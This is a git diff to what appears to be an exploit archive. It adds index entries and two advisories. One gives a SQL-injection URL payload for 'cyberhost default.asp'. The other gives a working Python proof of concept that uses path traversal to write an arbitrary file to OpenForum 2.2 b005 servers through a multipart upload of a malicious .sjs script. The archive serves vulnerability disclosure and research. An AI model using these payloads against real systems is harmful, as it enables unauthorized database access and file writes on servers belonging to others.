diff --git a/files.csv b/files.csv index 09c35de12..fbbc9ad3d 100755 --- a/files.csv +++ b/files.csv @@ -30651,3 +30651,5 @@ id,file,description,date,author,platform,type,port 34031,platforms/php/webapps/34031.txt,"gpEasy CMS 1.6.2 'editing_files.php' Cross Site Scripting Vulnerability",2010-05-18,"High-Tech Bridge SA",php,webapps,0 34032,platforms/php/webapps/34032.txt,"NPDS Revolution 10.02 'admin.php' Cross-Site Request Forgery Vulnerability",2010-05-20,"High-Tech Bridge SA",php,webapps,0 34033,platforms/hardware/remote/34033.html,"Cisco DPC2100 2.0.2 r1256-060303 Multiple Security Bypass and Cross-Site Request Forgery Vulnerabilities",2010-05-24,"Dan Rosenberg",hardware,remote,0 +34034,platforms/asp/webapps/34034.txt,"cyberhost 'default.asp' SQL Injection Vulnerability",2010-05-22,redst0rm,asp,webapps,0 +34035,platforms/php/webapps/34035.sjs,"OpenForum 2.2 b005 'saveAsAttachment()' Method Arbitrary File Creation Vulnerability",2010-05-23,"John Leitch",php,webapps,0 diff --git a/platforms/asp/webapps/34034.txt b/platforms/asp/webapps/34034.txt new file mode 100755 index 000000000..118f5c718 --- /dev/null +++ b/platforms/asp/webapps/34034.txt @@ -0,0 +1,7 @@ +source: http://www.securityfocus.com/bid/40357/info + +cyberhost is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. + +Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. + +http://www.example.com/default.asp?gb=paketayrinti&id=18+union+select+0,1,2,3,4,5,6,7+from+uye \ No newline at end of file diff --git a/platforms/php/webapps/34035.sjs b/platforms/php/webapps/34035.sjs new file mode 100755 index 000000000..abf44c58c --- /dev/null +++ b/platforms/php/webapps/34035.sjs @@ -0,0 +1,92 @@ +source: http://www.securityfocus.com/bid/40364/info + +OpenForum is prone to a vulnerability that may allow remote attackers to create arbitrary files on a vulnerable system. + +Successful exploits will allow an attacker to create arbitrary files, which may then be executed to perform unauthorized actions. This may aid in further attacks. + +OpenForum 2.2 b005 is vulnerable; other versions may also be affected. + +#============================================================================================================# +# _ _ __ __ __ _______ _____ __ __ _____ _ _ _____ __ __ # +# /_/\ /\_\ /\_\ /\_\ /\_\ /\_______)\ ) ___ ( /_/\__/\ ) ___ ( /_/\ /\_\ /\_____\/_/\__/\ # +# ) ) )( ( ( \/_/( ( ( ( ( ( \(___ __\// /\_/\ \ ) ) ) ) )/ /\_/\ \ ) ) )( ( (( (_____/) ) ) ) ) # +# /_/ //\\ \_\ /\_\\ \_\ \ \_\ / / / / /_/ (_\ \ /_/ /_/ // /_/ (_\ \/_/ //\\ \_\\ \__\ /_/ /_/_/ # +# \ \ / \ / // / // / /__ / / /__ ( ( ( \ \ )_/ / / \ \ \_\/ \ \ )_/ / /\ \ / \ / // /__/_\ \ \ \ \ # +# )_) /\ (_(( (_(( (_____(( (_____( \ \ \ \ \/_\/ / )_) ) \ \/_\/ / )_) /\ (_(( (_____\)_) ) \ \ # +# \_\/ \/_/ \/_/ \/_____/ \/_____/ /_/_/ )_____( \_\/ )_____( \_\/ \/_/ \/_____/\_\/ \_\/ # +# # +#============================================================================================================# +# # +# Vulnerability............Arbitrary File Write # +# Software.................Open Forum Server 2.2 b005 # +# Download.................http://code.google.com/p/open-forum # +# Date.....................5/23/10 # +# # +#============================================================================================================# +# # +# Site.....................http://cross-site-scripting.blogspot.com/ # +# Email....................john.leitch5@gmail.com # +# # +#============================================================================================================# +# # +# ##Description## # +# # +# An arbitrary file write vulnerability in the saveAsAttachment method of Open Forum Server 2.2 b005 can be # +# exploited to write to the local file system of the server. # +# # +# # +# ##Exploit## # +# # +# Upload a get.sjs file that calls the vulnerable method. Request the script's containing folder. # +# # +# # +# ##Proof of Concept## # +# # +import sys, socket +host = 'localhost' +port = 80 + +def send_request(request): + s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) + s.settimeout(32) # sometimes it takes a while + s.connect((host, port)) + s.send(request) + + response = s.recv(8192) + s.recv(8192) # a hack within a hack + + return response + +def write_file(): + try: + content = '----x--\r\n'\ + 'Content-Disposition: form-data; name="file"; filename="get.sjs"\r\n'\ + 'Content-Type: application/octet-stream\r\n\r\n'\ + 'fileName = "' + '..\\\\' * 256 + 'x.txt";\r\n'\ + 'data = "hello, world";\r\n'\ + 'user = transaction.getUser();\r\n'\ + 'wiki.saveAsAttachment("x",fileName,data,user);\r\n'\ + 'transaction.sendPage("File Written");\r\n\r\n'\ + '----x----\r\n' + + response = send_request('POST OpenForum/Actions/Attach?page=OpenForum HTTP/1.1\r\n' + 'Host: ' + host + '\r\n' + 'Content-Type: multipart/form-data; boundary=--x--\r\n' + 'Content-Length: ' + str(len(content)) + '\r\n\r\n' + content) + + if 'HTTP/1.1 302 Redirect' not in response: + print 'Error writing get.sjs' + return + else: print 'get.sjs created' + + response = send_request('GET OpenForum HTTP/1.1\r\n' + 'Host: ' + host + '\r\n\r\n') + + if 'File Written' not in response: + print 'Error writing to root' + return + else: print 'x.txt created in root' + + except Exception: + print sys.exc_info() + +write_file()